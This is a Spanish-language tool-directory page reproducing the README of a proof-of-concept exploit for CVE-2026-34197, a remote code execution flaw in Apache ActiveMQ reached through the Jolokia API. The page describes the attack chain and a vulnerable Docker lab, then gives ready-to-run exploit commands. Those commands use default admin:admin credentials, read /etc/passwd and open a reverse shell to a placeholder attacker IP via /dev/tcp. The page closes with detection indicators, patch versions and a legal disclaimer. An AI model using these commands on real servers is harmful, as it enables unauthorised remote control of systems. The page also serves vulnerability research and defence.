Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-34197 — Proof-of-concept exploit for CVE-2026-34197, an RCE in Apache ActiveMQ via the Jolokia API. Includes a Python exploit, payload template, and Docker lab for testing and research. | Kitploit
Herramientas/GitHubGitHub/devsecurityspro/cve-2026-34197
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed TeamingLabs & Practice
GitHubdevsecurityspro/cve-2026-34197

CVE-2026-34197

Proof-of-concept exploit for CVE-2026-34197, an RCE in Apache ActiveMQ via the Jolokia API. Includes a Python exploit, payload template, and Docker lab for testing and research.

Ver Repositorio
4hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-34197 — Apache ActiveMQ RCE vía Jolokia API

Descripción

CVE-2026-34197 es una vulnerabilidad de ejecución remota de código (RCE) en Apache ActiveMQ Classic que permite a un atacante ejecutar comandos arbitrarios en el sistema operativo del servidor a través de la API Jolokia expuesta en la consola web.

La vulnerabilidad existe desde hace más de 13 años y reside en la interacción entre múltiples componentes: Jolokia (puente HTTP-JMX), los MBeans de ActiveMQ, los conectores de red y el transporte VM.

Información de la Vulnerabilidad

CampoDetalle
CVE IDCVE-2026-34197
TipoRCE (Remote Code Execution)
CWECWE-20 (Validación de entrada incorrecta), CWE-94 (Inyección de código)
Versiones afectadasActiveMQ Classic < 5.19.4, 6.0.0 — 6.2.2
Versiones parcheadas5.19.4, 6.2.3
Autenticación requeridaSí (credenciales por defecto admin:admin comunes)
Sin autenticación en6.0.0 — 6.1.1 (por CVE-2024-32114)
Puerto por defecto8161 (consola web)

Mecanismo de Explotación

La cadena de ataque funciona así:

  1. El atacante envía una petición POST a /api/jolokia/ invocando la operación addNetworkConnector del MBean del broker.
  2. El argumento contiene un URI con transporte vm:// que referencia un broker inexistente.
  3. ActiveMQ intenta crear ese broker al vuelo y acepta el parámetro brokerConfig que apunta a una URL remota.
  4. El esquema xbean: indica que el recurso es un archivo de configuración Spring XML.
  5. Spring instancia todos los beans definidos en el XML, incluyendo uno que ejecuta Runtime.getRuntime().exec().
  6. Se ejecuta el comando arbitrario en el servidor.
root@kitploit:~
Atacante                          ActiveMQ (víctima)
   |                                    |
   |-- POST /api/jolokia/ ------------>|
   |   addNetworkConnector(            |
   |     vm://rce?brokerConfig=        |
   |     xbean:http://ATACANTE/x.xml)  |
   |                                    |
   |                                    |-- Crea broker VM
   |                                    |-- Descarga x.xml
   |<-- GET /x.xml --------------------|
   |-- Responde con payload XML ------>|
   |                                    |-- Spring instancia beans
   |                                    |-- Runtime.exec(COMANDO)
   |                                    |

Estructura del Proyecto

root@kitploit:~
CVE-2026-34197/
├── README.md              # Este archivo
├── exploit.py             # PoC principal
├── payloads/
│   └── template.xml       # Plantilla del payload Spring XML
├── docker/
│   └── docker-compose.yml # Entorno de laboratorio vulnerable
└── LICENSE

Requisitos

  • Python 3.8+
  • Módulos: requests, http.server, argparse (stdlib)
  • Acceso de red al puerto 8161 del objetivo
  • Docker y Docker Compose (opcional, para el laboratorio)
root@kitploit:~
pip install requests

Uso

1. Levantar el entorno vulnerable (opcional)

root@kitploit:~
cd docker
docker-compose up -d

Esto levanta un ActiveMQ Classic 5.18.6 vulnerable en localhost:8161.

2. Ejecutar el exploit

root@kitploit:~
# Uso básico con credenciales por defecto
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "id"

# Especificar credenciales
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "whoami" -u admin -p admin

# Especificar puerto del servidor HTTP del payload
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -lp 9999 -c "cat /etc/passwd"

# Modo sin autenticación (ActiveMQ 6.0.0 - 6.1.1)
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "id" --no-auth

# Shell reversa
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "bash -i >& /dev/tcp/ATACANTE_IP/4444 0>&1"

Parámetros

ParámetroDescripción
-t, --targetURL base del objetivo (ej: http://10.0.0.1:8161)
-l, --lhostIP del atacante para servir el payload XML
-lp, --lportPuerto del servidor HTTP local (por defecto: 8888)
-c, --commandComando a ejecutar en el objetivo
-u, --userUsuario (por defecto: admin)
-p, --passwordContraseña (por defecto: admin)
--no-authNo enviar credenciales (para versiones 6.0.0 - 6.1.1)
--broker-nameNombre del broker (por defecto: localhost)

Detección

Indicadores en los logs del broker ActiveMQ:

root@kitploit:~
INFO  | Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml
WARN  | Could not connect to remote URI: vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml

Otros indicadores:

  • Peticiones POST a /api/jolokia/ con addNetworkConnector en el cuerpo
  • Conexiones HTTP salientes desde el proceso de ActiveMQ a hosts inesperados
  • Procesos hijos inesperados generados por el proceso Java de ActiveMQ

Remediación

  • Actualizar a ActiveMQ Classic 5.19.4 o 6.2.3
  • Cambiar las credenciales por defecto de la consola web
  • Restringir el acceso de red al puerto 8161
  • Monitorear los logs del broker en busca de URIs vm:// con brokerConfig=xbean:http

Referencias

  • NVD — CVE-2026-34197
  • Horizon3 — Análisis técnico
  • Apache ActiveMQ — Aviso de seguridad
  • CVE-2024-32114 — Jolokia sin autenticación
  • CVE-2023-46604 — RCE OpenWire (CISA KEV)

Autor

Creado por KONDOR DEV SECURITY

Telegram

Aviso Legal

Este PoC se proporciona exclusivamente con fines educativos y de investigación en seguridad. El uso de esta herramienta contra sistemas sin autorización explícita es ilegal. El autor no se hace responsable del uso indebido de esta herramienta.

Licencia

MIT — Copyright (c) 2026 KONDOR DEV SECURITY

Descargar herramienta